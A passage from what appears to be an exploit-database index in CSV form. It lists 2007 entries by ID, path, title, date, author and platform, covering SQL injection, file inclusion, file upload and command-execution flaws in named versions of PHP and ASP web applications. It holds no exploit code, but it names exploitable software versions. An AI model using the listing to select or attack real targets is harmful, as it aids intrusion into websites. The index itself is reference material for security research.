Arbitrary File Upload",2007-08-30,Don,cgi,webapps, -4346,exploits/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps, -4349,exploits/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection",2007-08-31,k1tk4t,php,webapps, -4350,exploits/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection",2007-09-01,Silentz,php,webapps, -4352,exploits/php/webapps/4352.txt,"Weblogicnet - 'files_dir' Multiple Remote File Inclusions",2007-09-02,bius,php,webapps, -4353,exploits/php/webapps/4353.txt,"Yvora CMS 1.0 - 'error_view.php?ID' SQL Injection",2007-09-02,k1tk4t,php,webapps, -4356,exploits/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps, -4358,exploits/php/webapps/4358.txt,"STPHPLibrary - 'STPHPLIB_DIR' Remote File Inclusion",2007-09-03,leetsecurity,php,webapps, -4363,exploits/php/webapps/4363.txt,"PHPOF 20040226 - 'DB_adodb.class.php' Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps, -4365,exploits/php/webapps/4365.txt,"AnyInventory 2.0 - 'Environment.php' Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps, -4368,exploits/php/webapps/4368.txt,"PHPMytourney - 'menu.php' Remote File Inclusion",2007-09-06,S.W.A.T.,php,webapps, -4370,exploits/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE - 'start.php' SQL Injection",2007-09-07,k1tk4t,php,webapps, -4371,exploits/php/webapps/4371.txt,"RW::Download 2.0.3 lite - 'index.php?dlid' SQL Injection",2007-09-07,k1tk4t,php,webapps, -4374,exploits/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,php,webapps, -4376,exploits/php/webapps/4376.txt,"TLM CMS 3.2 - Multiple SQL Injections",2007-09-08,k1tk4t,php,webapps, -4377,exploits/php/webapps/4377.txt,"Focus/SIS 1.0/2.2 - Remote File Inclusion",2007-09-08,"ThE TiGeR",php,webapps, -4378,exploits/php/webapps/4378.html,"Fuzzylime CMS 3.0 - Local File Inclusion",2007-09-08,"not sec group",php,webapps, -4380,exploits/php/webapps/4380.txt,"Sisfo Kampus 2006 - 'blanko.preview.php' Local File Disclosure",2007-09-08,QTRinux,php,webapps, -4381,exploits/php/webapps/4381.txt,"Txx CMS 0.2 - Multiple Remote File Inclusions",2007-09-08,"Nice Name Crew",php,webapps, -4382,exploits/php/webapps/4382.txt,"PHPress 0.2.0 - 'adisplay.php?lang' Local File Inclusion",2007-09-08,"Nice Name Crew",php,webapps, -4383,exploits/php/webapps/4383.txt,"Joomla! Component Restaurante - Arbitrary File Upload",2007-09-08,"Cold Zero",php,webapps, -4384,exploits/php/webapps/4384.txt,"WebED 0.8999a - Multiple Remote File Inclusions",2007-09-08,MhZ91,php,webapps, -4385,exploits/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple SQL Injections",2007-09-09,k1tk4t,php,webapps, -4386,exploits/php/webapps/4386.txt,"Sisfo Kampus 2006 - 'dwoprn.php?f' Arbitrary File Download",2007-09-10,k-one,php,webapps, -4387,exploits/php/webapps/4387.txt,"phpRealty 0.02 - 'MGR' Multiple Remote File Inclusions",2007-09-10,QTRinux,php,webapps, -4390,exploits/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / Local File Inclusion",2007-09-10,k1tk4t,php,webapps, -4395,exploits/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps, -4396,exploits/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusions",2007-09-11,aLiiF,php,webapps, -4397,exploits/php/webapps/4397.rb,"WordPress 1.5.1.1 < 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps, -4400,exploits/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,php,webapps, -4401,exploits/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps, -4404,exploits/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps, -4405,exploits/php/webapps/4405.txt,"Ajax File Browser 3b - 'settings.inc.php?approot' Remote File Inclusion",2007-09-14,"arfis project",php,webapps, -4406,exploits/php/webapps/4406.txt,"phpFFL 1.24 - 'PHPFFL_FILE_ROOT' Remote File Inclusion",2007-09-14,Dj7xpl,php,webapps, -4407,exploits/php/webapps/4407.java,"PHP Webquest 2.5 - 'id_actividad' SQL Injection",2007-09-14,D4real_TeaM,php,webapps, -4408,exploits/php/webapps/4408.pl,"JBlog 1.0 - 'index.php?id' SQL Injection",2007-09-14,s4mi,php,webapps, -4410,exploits/php/webapps/4410.php,"Gelato - 'index.php?post' SQL Injection",2007-09-14,s0cratex,php,webapps, -4411,exploits/php/webapps/4411.txt,"Chupix CMS 0.2.3 - 'download.php' Remote File Disclosure",2007-09-15,GoLd_M,php,webapps, -4412,exploits/php/webapps/4412.pl,"KwsPHP 1.0 - 'login.php' SQL Injection",2007-09-15,s4mi,php,webapps, -4413,exploits/php/webapps/4413.pl,"KwsPHP 1.0 Member_Space Module - SQL Injection",2007-09-15,s4mi,php,webapps, -4414,exploits/php/webapps/4414.pl,"KwsPHP 1.0 stats Module - SQL Injection",2007-09-15,s4mi,php,webapps, -4415,exploits/php/webapps/4415.txt,"Joomla! Component flash fun! 1.0 - Remote File Inclusion",2007-09-15,Morgan,php,webapps, -4416,exploits/php/webapps/4416.txt,"Joomla! Component joom12pic 1.0 - Remote File Inclusion",2007-09-16,Morgan,php,webapps, -4417,exploits/php/webapps/4417.txt,"SimpCMS - 'keyword' SQL Injection",2007-09-16,"Cold Zero",php,webapps, -4418,exploits/php/webapps/4418.sh,"Omnistar Article Manager Software - 'article.php' SQL Injection",2007-09-16,"Cold Zero",php,webapps, -4419,exploits/php/webapps/4419.php,"Shop-Script FREE 2.0 - Remote Command Execution",2007-09-17,InATeam,php,webapps, -4421,exploits/php/webapps/4421.txt,"phpsyncml 0.1.2 - Remote File Inclusion",2007-09-18,S.W.A.T.,php,webapps, -4422,exploits/php/webapps/4422.txt,"KwsPHP 1.0 sondages Module - SQL Injection",2007-09-18,Houssamix,php,webapps, -4423,exploits/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps, -4425,exploits/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps, -4430,exploits/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps, -4433,exploits/php/webapps/4433.pl,"OneCMS 2.4 - 'abc' SQL Injection",2007-09-19,str0ke,php,webapps, -4434,exploits/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps, -4435,exploits/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation",2007-09-20,undefined1_,php,webapps, -4436,exploits/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,php,webapps, -4439,exploits/php/webapps/4439.txt,"neuron news 1.0 - 'index.php?q' Local File Inclusion",2007-09-21,Dj7xpl,php,webapps, -4440,exploits/php/webapps/4440.txt,"Joomla! Component com_slideshow - Remote File Inclusion",2007-09-21,ShockShadow,php,webapps, -4441,exploits/php/webapps/4441.txt,"iziContents rc6 - Local/Remote File Inclusion",2007-09-21,irk4z,php,webapps, -4442,exploits/php/webapps/4442.txt,"CMS Made Simple 1.2 - Remote Code Execution",2007-09-21,irk4z,php,webapps, -4443,exploits/php/webapps/4443.txt,"ClanSphere 2007.4 - 'cat_id' SQL Injection",2007-09-22,IHTeam,php,webapps, -4444,exploits/php/webapps/4444.txt,"Black Lily 2007 - 'products.php?class' SQL Injection",2007-09-22,VerY-SecReT,php,webapps, -4446,exploits/php/webapps/4446.txt,"Wordsmith 1.1b - 'config.inc.php?_path' Remote File Inclusion",2007-09-23,ShockShadow,php,webapps, -4447,exploits/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",2007-09-23,"BorN To K!LL",php,webapps, -4448,exploits/php/webapps/4448.txt,"helplink 0.1.0 - 'show.php' Remote File Inclusion",2007-09-23,GoLd_M,php,webapps, -4449,exploits/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - SQL Injection",2007-09-23,IHTeam,php,webapps, -4451,exploits/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusions",2007-09-24,BiNgZa,php,webapps, -4454,exploits/php/webapps/4454.txt,"sk.log 0.5.3 - 'skin_url' Remote File Inclusion",2007-09-24,w0cker,php,webapps, -4456,exploits/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion",2007-09-26,kezzap66345,php,webapps, -4457,exploits/php/webapps/4457.txt,"Softbiz Classifieds PLUS - 'id' SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps, -4458,exploits/asp/webapps/4458.txt,"Novus 1.0 - 'notas.asp?nota_id' SQL Injection",2007-09-26,ka0x,asp,webapps, -4459,exploits/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps, -4461,exploits/php/webapps/4461.txt,"lustig.cms Beta 2.5 - 'forum.php?view' Remote File Inclusion",2007-09-27,GoLd_M,php,webapps, -4462,exploits/php/webapps/4462.txt,"Chupix CMS 0.2.3 - 'repertoire' Remote File Inclusion",2007-09-27,0in,php,webapps, -4463,exploits/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps, -4464,exploits/php/webapps/4464.txt,"PhFiTo 1.3.0 - 'SRC_PATH' Remote File Inclusion",2007-09-28,w0cker,php,webapps, -4465,exploits/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps, -4466,exploits/php/webapps/4466.php,"Zomplog 3.8.1 - Arbitrary File Upload",2007-09-28,InATeam,php,webapps, -4467,exploits/php/webapps/4467.pl,"MD-Pro 1.0.76 - SQL Injection",2007-09-29,undefined1_,php,webapps, -4469,exploits/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps, -4470,exploits/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,php,webapps, -4471,exploits/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - 'BBStore.php' Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps, -4472,exploits/php/webapps/4472.txt,"actSite 1.56 - 'news.php' Local File Inclusion",2007-10-01,DNX,php,webapps, -4473,exploits/php/webapps/4473.txt,"actSite 1.991 Beta - 'base.php' Remote File Inclusion",2007-10-01,DNX,php,webapps, -4475,exploits/php/webapps/4475.php,"PHP-Fusion module Expanded Calendar 2.x - SQL Injection",2007-10-01,Matrix86,php,webapps, -4476,exploits/php/webapps/4476.txt,"Segue CMS 1.8.4 - 'index.php' Remote File Inclusion",2007-10-01,kezzap66345,php,webapps, -4477,exploits/php/webapps/4477.txt,"PHP wcms XT 0.0.7 - Multiple Remote File Inclusions",2007-10-01,kezzap66345,php,webapps, -4480,exploits/php/webapps/4480.pl,"MultiCart 1.0 - Blind SQL Injection",2007-10-02,k1tk4t,php,webapps, -4481,exploits/php/webapps/4481.txt,"Poppawid 2.7 - 'form' Remote File Inclusion",2007-10-02,0in,php,webapps, -4482,exploits/php/webapps/4482.txt,"Web Template Management System 1.3 - SQL Injection",2007-10-04,bius,php,webapps, -4483,exploits/php/webapps/4483.txt,"Ossigeno CMS 2.2a3 - 'footer.php' Remote File Inclusion",2007-10-04,"Nice Name Crew",php,webapps, -4485,exploits/php/webapps/4485.txt,"Trionic Cite CMS 1.2rev9 - Remote File Inclusion",2007-10-05,GoLd_M,php,webapps, -4486,exploits/asp/webapps/4486.txt,"Furkan Tastan Blog - SQL Injection",2007-10-05,CyberGhost,asp,webapps, -4489,exploits/php/webapps/4489.txt,"Joomla! Component panoramic 1.0 - Remote File Inclusion",2007-10-06,NoGe,php,webapps, -4490,exploits/php/webapps/4490.txt,"Else If CMS 0.6 - Multiple Vulnerabilities",2007-10-06,"HACKERS PAL",php,webapps, -4491,exploits/php/webapps/4491.php,"CMS Creamotion - 'securite.php' Remote File Inclusion",2007-10-06,"HACKERS PAL",php,webapps, -4492,exploits/php/webapps/4492.txt,"Picturesolution 2.1 - 'config.php?path' Remote File Inclusion",2007-10-06,Mogatil,php,webapps, -4493,exploits/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure",2007-10-06,SnIpEr_SA,php,webapps, -4494,exploits/php/webapps/4494.txt,"Verlihub Control Panel 1.7.x - Local File Inclusion",2007-10-07,TEAMELITE,php,webapps, -4495,exploits/php/webapps/4495.txt,"idmos-phoenix CMS - 'aural.php' Remote File Inclusion",2007-10-07,"HACKERS PAL",php,webapps, -4496,exploits/php/webapps/4496.txt,"Joomla! Component Flash Image Gallery - Remote File Inclusion",2007-10-07,"Mehmet Ince",php,webapps, -4497,exploits/php/webapps/4497.txt,"Joomla! Component wmtportfolio 1.0 - Remote File Inclusion",2007-10-07,NoGe,php,webapps, -4499,exploits/php/webapps/4499.txt,"Joomla! Component mosmedialite451 - Remote File Inclusion",2007-10-08,k1n9k0ng,php,webapps, -4500,exploits/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps, -4501,exploits/php/webapps/4501.php,"PHP Homepage M 1.0 - 'galerie.php' SQL Injection",2007-10-08,"[PHCN] Mahjong",php,webapps, -4502,exploits/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion",2007-10-08,"BorN To K!LL",php,webapps, -4503,exploits/php/webapps/4503.txt,"LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion",2007-10-08,S.W.A.T.,php,webapps, -4504,exploits/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL Injection",2007-10-08,"Khashayar Fereidani",php,webapps, -4505,exploits/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution",2007-10-09,BlackHawk,php,webapps, -4507,exploits/php/webapps/4507.txt,"Joomla! Component mp3 allopass 1.0 - Remote File Inclusion",2007-10-10,NoGe,php,webapps, -4508,exploits/php/webapps/4508.txt,"Joomla! Component JContentSubscription 1.5.8 - Multiple Remote File Inclusions",2007-10-10,NoGe,php,webapps, -4509,exploits/php/webapps/4509.txt,"TikiWiki 1.9.8 - Remote PHP Injection",2007-10-10,ShAnKaR,php,webapps, -4510,exploits/php/webapps/4510.txt,"Drupal 5.2 - PHP Zend Hash ation Vector",2007-10-10,ShAnKaR,php,webapps, -4511,exploits/php/webapps/4511.pl,"cpDynaLinks 1.02 - 'category.php' SQL Injection",2007-10-10,ka0x,php,webapps, -4512,exploits/php/webapps/4512.txt,"nuseo PHP enterprise 1.6 - Remote File Inclusion",2007-10-10,BiNgZa,php,webapps, -4513,exploits/php/webapps/4513.php,"PHP-Stats 0.1.9.2 - Multiple Vulnerabilities",2007-10-10,EgiX,php,webapps, -4518,exploits/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps, -4519,exploits/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps, -4520,exploits/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps, -4521,exploits/php/webapps/4521.txt,"Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps, -4523,exploits/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps, -4524,exploits/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps, -4525,exploits/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps, -4527,exploits/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps, -4528,exploits/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module - SQL Injection",2007-10-13,"Mehmet Ince",php,webapps, -4529,exploits/cgi/webapps/4529.txt,"WWWISIS 7.1 - 'IsisScript' Local File Disclosure / Cross-Site Scripting",2007-10-13,JosS,cgi,webapps, -4536,exploits/php/webapps/4536.txt,"doop CMS 1.3.7 - Local File Inclusion",2007-10-15,vladii,php,webapps, -4538,exploits/php/webapps/4538.txt,"Artmedic CMS 3.4 - 'index.php' Local File Inclusion",2007-10-16,iNs,php,webapps, -4539,exploits/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - SQL Injection",2007-10-16,dumenci,php,webapps, -4543,exploits/php/webapps/4543.txt,"PHPDJ 0.5 - 'djpage.php' Remote File Inclusion",2007-10-17,GoLd_M,php,webapps, -4544,exploits/php/webapps/4544.txt,"LimeSurvey 1.52 - 'language.php' Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps, -4545,exploits/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusions",2007-10-18,S.W.A.T.,php,webapps, -4546,exploits/php/webapps/4546.txt,"ZZ FlashChat 3.1 - 'help.php' Local File Inclusion",2007-10-19,d3hydr8,php,webapps, -4547,exploits/php/webapps/4547.pl,"Simple Machines Forum (SMF) 1.1.3 - Blind SQL Injection",2007-10-20,"Michael Brooks",php,webapps, -4548,exploits/php/webapps/4548.php,"Vanilla 1.1.3 - Blind SQL Injection",2007-10-20,InATeam,php,webapps, -4549,exploits/php/webapps/4549.txt,"PHP Project Management 0.8.10 - Multiple Local/Remote File Inclusions",2007-10-21,GoLd_M,php,webapps, -4550,exploits/php/webapps/4550.pl,"BBPortalS 2.0 - Blind SQL Injection",2007-10-21,Max007,php,webapps, -4551,exploits/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusions",2007-10-21,GoLd_M,php,webapps, -4554,exploits/php/webapps/4554.txt,"Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion",2007-10-22,BiNgZa,php,webapps, -4555,exploits/php/webapps/4555.txt,"TOWeLS 0.1 - 'scripture.php' Remote File Inclusion",2007-10-22,GoLd_M,php,webapps, -4557,exploits/php/webapps/4557.txt,"Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,php,webapps, -4558,exploits/php/webapps/4558.txt,"InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion",2007-10-22,"BorN To K!LL",php,webapps, -4561,exploits/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps, -4562,exploits/php/webapps/4562.txt,"Flatnuke 3 - Remote Cookie Manipulation / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps, -4563,exploits/php/webapps/4563.txt,"PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion",2007-10-23,BiNgZa,php,webapps, -4565,exploits/php/webapps/4565.txt,"PHP Image 1.2 - Multiple Remote File Inclusions",2007-10-23,Civi,php,webapps, -4568,exploits/php/webapps/4568.txt,"TikiWiki 1.9.8.1 - Local File Inclusion",2007-10-25,L4teral,php,webapps, -4575,exploits/php/webapps/4575.txt,"GoSamba 1.0.1 - 'INCLUDE_PATH' Multiple Remote File Inclusions",2007-10-27,GoLd_M,php,webapps, -4576,exploits/php/webapps/4576.txt,"JobSite Professional 2.0 - 'file.php' SQL Injection",2007-10-28,ZynbER,php,webapps, -4577,exploits/php/webapps/4577.txt,"CaupoShop Pro 2.x - 'action' Remote File Inclusion",2007-10-28,mozi,php,webapps, -4578,exploits/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - 'emc.asp' SQL Injection",2007-10-28,hak3r-b0y,asp,webapps, -4580,exploits/php/webapps/4580.txt,"FireConfig 0.5 - 'dl.php' Remote File Disclosure",2007-10-28,GoLd_M,php,webapps, -4581,exploits/php/webapps/4581.txt,"Sige 0.1 - 'sige_init.php' Remote File Inclusion",2007-10-28,GoLd_M,php,webapps, -4582,exploits/php/webapps/4582.txt,"teatro 1.6 - 'basePath' Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps, -4585,exploits/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - Remote File Inclusion",2007-10-29,r00t@zapak.com,php,webapps, -4586,exploits/php/webapps/4586.txt,"ProfileCMS 1.0 - Arbitrary File Upload",2007-10-29,r00t@zapak.com,php,webapps, -4587,exploits/php/webapps/4587.txt,"MiniBB 2.1 - 'table' SQL Injection",2007-10-30,irk4z,php,webapps, -4588,exploits/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - 'dir_ws' Remote File Inclusion",2007-10-30,BiNgZa,php,webapps, -4589,exploits/php/webapps/4589.html,"PHP-AGTC Membership System 1.1a - Remote Add Admin",2007-10-30,0x90,php,webapps, -4591,exploits/php/webapps/4591.txt,"ModuleBuilder 1.0 - 'file' Remote File Disclosure",2007-10-31,GoLd_M,php,webapps, -4592,exploits/php/webapps/4592.txt,"ISPworker 1.21 - 'download.php' Remote File Disclosure",2007-10-31,GoLd_M,php,webapps, -4593,exploits/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps, -4595,exploits/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps, -4596,exploits/php/webapps/4596.txt,"Scribe 0.2 - PHP Remote Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps, -4597,exploits/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusions",2007-11-02,GoLd_M,php,webapps, -4599,exploits/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - 'index.php?module' Local File Inclusion",2007-11-02,GoLd_M,php,webapps, -4602,exploits/php/webapps/4602.txt,"GuppY 4.6.3 - 'index.php?selskin' Remote File Inclusion",2007-11-03,irk4z,php,webapps, -4603,exploits/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion",2007-11-03,GoLd_M,php,webapps, -4604,exploits/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - 'common.php?pathdot' Remote File Inclusion",2007-11-03,GoLd_M,php,webapps, -4605,exploits/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,php,webapps, -4606,exploits/php/webapps/4606.txt,"nuBoard 0.5 - 'site' Remote File Inclusion",2007-11-04,GoLd_M,php,webapps, -4607,exploits/php/webapps/4607.txt,"SyndeoCMS 2.5.01 - 'cmsdir' Remote File Inclusion",2007-11-04,mdx,php,webapps, -4608,exploits/php/webapps/4608.php,"JBC Explorer 7.20 RC 1 - Remote Code Execution",2007-11-05,DarkFig,php,webapps, -4609,exploits/asp/webapps/4609.txt,"ASP Message Board 2.2.1c - SQL Injection",2007-11-05,Q7x,asp,webapps, -4611,exploits/php/webapps/4611.txt,"jPORTAL 2 - 'mailer.php' SQL Injection",2007-11-06,Kacper,php,webapps, -4614,exploits/php/webapps/4614.txt,"jPORTAL 2.3.1 - 'articles.php' SQL Injection",2007-11-09,Alexsize,php,webapps, -4617,exploits/php/webapps/4617.txt,"Softbiz Auctions Script - 'product_desc.php' SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps, -4618,exploits/php/webapps/4618.txt,"Softbiz Ad Management plus Script 1 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps, -4619,exploits/php/webapps/4619.txt,"Softbiz Banner Exchange Network Script 1.0 - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps, -4620,exploits/php/webapps/4620.txt,"Softbiz Link Directory Script - SQL Injection",2007-11-11,"Khashayar Fereidani",php,webapps, -4621,exploits/php/webapps/4621.txt,"patBBcode 1.0 - 'bbcodeSource.php' Remote File Inclusion",2007-11-12,p4sswd,php,webapps, -4622,exploits/php/webapps/4622.txt,"Myspace Clone Script - SQL Injection",2007-11-13,t0pP8uZz,php,webapps, -4623,exploits/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple SQL Injections",2007-11-14,k1tk4t,php,webapps, -4626,exploits/php/webapps/4626.txt,"Joomla! Component Carousel Flash Image Gallery - Remote File Inclusion",2007-11-16,Crackers_Child,php,webapps, -4627,exploits/php/webapps/4627.txt,"ProfileCMS 1.0 - 'id' SQL Injection",2007-11-16,K-159,php,webapps, -4628,exploits/php/webapps/4628.txt,"Myspace Clone Script - 'index.php' Remote File Inclusion",2007-11-16,VerY-SecReT,php,webapps, -4629,exploits/php/webapps/4629.txt,"net-finity - 'links.php' SQL Injection",2007-11-16,VerY-SecReT,php,webapps, -4630,exploits/php/webapps/4630.txt,"meBiblio 0.4.5 - 'action' Remote File Inclusion",2007-11-17,ShAy6oOoN,php,webapps, -4631,exploits/php/webapps/4631.txt,"phpBBViet 02.03.2007 - 'phpbb_root_path' Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps, -4632,exploits/php/webapps/4632.txt,"Vigile CMS 1.4 - Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps, -4633,exploits/php/webapps/4633.txt,"HotScripts Clone Script - SQL Injection",2007-11-18,t0pP8uZz,php,webapps, -4634,exploits/php/webapps/4634.php,"IceBB 1.0-rc6 - Remote Database Authentication Details",2007-11-18,Gu1ll4um3r0m41n,php,webapps, -4635,exploits/php/webapps/4635.php,"Sciurus Hosting Panel - Remote Code Injection",2007-11-18,Liz0ziM,php,webapps, -4636,exploits/php/webapps/4636.txt,"Joomla! Component juser 1.0.14 - Remote File Inclusion",2007-11-19,NoGe,php,webapps, -4637,exploits/php/webapps/4637.txt,"bcoos 1.0.10 - Local File Inclusion / SQL Injection",2007-11-20,BugReport.IR,php,webapps, -4638,exploits/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps, -4639,exploits/php/webapps/4639.html,"Ucms 1.8 - Backdoor Remote Command Execution",2007-11-21,D4m14n,php,webapps, -4640,exploits/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusions",2007-11-21,NoGe,php,webapps, -4641,exploits/php/webapps/4641.txt,"Alstrasoft e-Friends 4.98 - 'seid' Multiple SQL Injections",2007-11-21,K-159,php,webapps, -4642,exploits/php/webapps/4642.txt,"DevMass Shopping Cart 1.0 - Remote File Inclusion",2007-11-22,S.W.A.T.,php,webapps, -4643,exploits/php/webapps/4643.py,"VigileCMS 1.8 - Stealth Remote Command Execution",2007-11-22,The:Paradox,php,webapps, -4644,exploits/asp/webapps/4644.txt,"NetAuctionHelp 4.1 - 'nsearch' SQL Injection",2007-11-22,"Aria-Security Team",asp,webapps, -4645,exploits/php/webapps/4645.txt,"Content Injector 1.52 - 'index.php?cat' SQL Injection",2007-11-22,S.W.A.T.,php,webapps, -4646,exploits/php/webapps/4646.pl,"PHPKIT 1.6.4pl1 - 'article.php' SQL Injection",2007-11-22,Shadowleet,php,webapps, -4647,exploits/cgi/webapps/4647.txt,"KB-Bestellsystem - 'kb_whois.cgi' Command Execution",2007-11-22,"Zero X",cgi,webapps, -4649,exploits/php/webapps/4649.txt,"Irola My-Time 3.5 - SQL Injection",2007-11-23,"Aria-Security Team",php,webapps, -4650,exploits/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - 'skin_file' Remote File Inclusion",2007-11-23,Crackers_Child,php,webapps, -4652,exploits/php/webapps/4652.txt,"Amber Script 1.0 - 'show_content.php?id' Local File Inclusion",2007-11-24,Crackers_Child,php,webapps, -4653,exploits/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - 'events.php' SQL Injection",2007-11-24,ka0x,php,webapps, -4654,exploits/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps, -4655,exploits/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps, -4656,exploits/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps, -4658,exploits/php/webapps/4658.php,"RunCMS 1.6 - 'disclaimer.php' Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps, -4659,exploits/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusions",2007-11-25,ShAy6oOoN,php,webapps, -4660,exploits/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps, -4661,exploits/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,php,webapps, -4662,exploits/php/webapps/4662.txt,"Tilde CMS 4.x - 'aarstal' SQL Injection",2007-11-26,KiNgOfThEwOrLd,php,webapps, -4665,exploits/php/webapps/4665.txt,"Eurologon CMS - Multiple SQL 